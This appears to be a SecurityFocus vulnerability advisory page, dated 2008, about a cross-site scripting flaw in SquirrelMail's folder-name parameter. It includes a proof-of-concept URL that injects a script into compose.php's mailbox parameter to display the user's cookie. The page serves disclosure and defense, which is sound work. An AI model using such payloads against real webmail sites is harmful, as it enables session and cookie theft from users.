Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

SquirrelMail Folder Name Cross-Site Scripting Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

http://www.example.com/mail/src/compose.php?mailbox="><script>window.alert(document.cookie)</script>







 

Privacy Statement
Copyright 2008, SecurityFocus